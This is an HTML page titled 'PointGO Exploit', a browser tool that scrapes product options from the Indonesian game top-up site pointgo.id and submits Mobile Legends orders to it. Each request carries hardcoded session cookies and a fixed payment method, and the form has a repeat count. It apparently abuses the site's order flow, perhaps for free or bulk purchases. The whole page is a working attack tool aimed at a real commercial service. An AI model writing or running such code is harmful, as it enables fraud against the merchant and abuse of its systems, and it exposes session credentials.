<!DOCTYPE html>
<html>

<head>
    <title>PointGO Exploit</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            width: 400px;
            padding: 20px;
            background-color: #f2f2f2;
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }

        h1,
        h2 {
            margin-top: 0;
            text-align: center;
        }

        .section {
            margin-bottom: 20px;
        }

        .form-label {
            display: block;
            margin-bottom: 5px;
        }

        .form-input {
            width: 100%;
            padding: 5px;
        }

        .submit-button {
            display: block;
            width: 100%;
            padding: 10px 20px;
            background-color: #4CAF50;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }

        .submit-button:hover {
            background-color: #45a049;
        }
    </style>
    <script>
        async function updateSelection() {
            var html = await fetch("https://pointgo.id/games/mobile-legends-1").then(x => x.text());
            html = html.split("\n");
            var product = [];
            html.forEach((x, i) => {
                if (x.includes('<input type="radio" for="product-')) {
                    var p = {};
                    p.id = x.split("product-")[1].split('"')[0];
                    p.nama = html[i + 4].split(">")[1].split("<")[0];
                    p.harga = Number(html[i + 6].split(" ")[0]).toLocaleString("en-US", { style: "currency", currency: "IDR" });
                    if (html[i + 8].includes("discount")) {
                        p.harga = "DISCOUNTED from (" + Number(html[i + 8].split(">")[1].split("<")[0]).toLocaleString("en-US", { style: "currency", currency: "IDR" }) + ") to (" + Number(html[i + 6].split(" ")[0]).toLocaleString("en-US", { style: "currency", currency: "IDR" }) + ")";
                        //p.discount = p.harga;
                        //p.harga = Number(html[i+8].split(">")[1].split("<")[0]).toLocaleString("en-US", {style: "currency", currency: "IDR"});
                    }
                    product.push(p);
                }
            });

            var select = [];
            product.forEach(x => {
                if (x.harga.includes("DISCOUNTED")) {
                    select.unshift(`<option value="${x.id}">${x.harga} - ${x.nama}</option>\n`);
                } else {
                    select.push(`<option value="${x.id}">${x.harga} - ${x.nama}</option>\n`);
                }
            });
            console.log(select);
            document.getElementById("select").innerHTML = select.join("\n"); 
        }
        function handleSubmit() {
            var accountID = document.getElementById("accountID").value;
            var zoneID = document.getElementById("zoneID").value;
            var wa = document.getElementById("wa").value;
            var method = 84;
            var select = document.getElementById("select").value;

            // Do something with the captured values
            console.log("Account ID : ", accountID);
            console.log("Zone ID : ", zoneID);
            console.log("WA : ", wa);
            console.log("Method : ", method);
            console.log("Select : ", select)

            // You can perform additional operations with the variables here
            fetch("https://pointgo.id/games/mobile-legends-1", {
                "mode": "no-cors",
                "headers": {
                    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
                    "accept-language": "en-US,en;q=0.9",
                    "cache-control": "max-age=0",
                    "content-type": "application/x-www-form-urlencoded",
                    "sec-ch-ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"",
                    "sec-ch-ua-mobile": "?0",
                    "sec-ch-ua-platform": "\"Windows\"",
                    "sec-fetch-dest": "document",
                    "sec-fetch-mode": "navigate",
                    "sec-fetch-site": "same-origin",
                    "sec-fetch-user": "?1",
                    "upgrade-insecure-requests": "1",
                    "cookie": "_fbp=fb.1.1688204922994.1426413270; __cf_bm=jotv0m9F.TTxHtRPD1JJBZgVNk8TsjC8FExv6O3atzQ-1688210875-0-AYLNgDxuxh5XZIM4ggc9/1zzYSQ5Et51cSV2lqDPjVZQftKcLk0xEE6TLIl+OFVQ7w==; ci_session=jvf2d2k73vpcuk68f2t53ectdbcn1vi9",
                    "Referer": "https://pointgo.id/games/mobile-legends",
                    "Referrer-Policy": "strict-origin-when-cross-origin"
                },
                "body": "user_id=" + accountID + "&zone_id=" + zoneID + "&username=&method=" + method + "&product=" + select + "&wa=" + wa + "&target=ml&voucher=&jumlah=1&tombol=submit",
                "method": "POST"
            });
            // Prevent form submission
            return false;
        }
    </script>
</head>

<body>
    <div class="container">
        <h1>PointGO Exploit</h1>
        <hr>

        <div class="section">
            <h2>Credentials</h2>
            <form>
                <label class="form-label" for="acc ountID">Account ID : </label>
                <input class="form-input" type="text" id="accountID" name="accountID">
            </form>
            <form>
                <label class="form-label" for="zoneID">Zone ID : </label>
                <input class="form-input" type="text" id="zoneID" name="zoneID">
            </form>
            <form>
                <label class="form-label" for="wa">WA : </label>
                <input class="form-input" type="text" id="wa" name="wa">
            </form>
            <form>
                <label class="form-label" for="method">Method : </label>
                <input class="form-input" type="text" id="method" name="method" value="84">
            </form>
            <form>
                <label class="form-label" for="method">Repat : </label>
                <input class="form-input" type="text" id="repeat" name="repeat" value="10">
            </form>
        </div>

        <div class="section">
            <h2 onclick="updateSelection()">Select</h2>
            <form>
                <select id="select">
                    <option value="&&&">GG</option>
                </select>
            </form>
        </div>

        <button class="submit-button" type="submit" onclick="handleSubmit()">SUBMIT</button>
    </div>
</body>

</html>